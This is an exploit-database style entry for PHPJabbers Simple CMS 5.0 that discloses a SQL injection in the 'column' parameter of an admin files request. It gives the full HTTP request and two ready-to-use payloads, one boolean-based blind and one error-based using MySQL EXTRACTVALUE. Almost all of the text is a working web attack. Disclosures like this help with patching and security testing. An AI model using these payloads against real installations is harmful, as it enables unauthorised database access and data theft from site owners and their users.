# Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection # Date: 2023-04-29 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.phpjabbers.com/faq.php # Software Link: https://www.phpjabbers.com/simple-cms/ # Version: 5.0 # Tested on: Kali Linux ### Request ### GET /simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 HTTP/1.1 Accept: */* x-requested-with: XMLHttpRequest Referer: https://localhost/simplecms/preview.php?lid=1 Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844; _fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292; pjd_simplecms=1; last_position=%2F Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive ### Parameter & Payloads ### Parameter: column (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869) THEN 2 ELSE (SELECT 2339 UNION SELECT 4063) END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: action=pjActionGetFile&column=2 AND EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT (ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10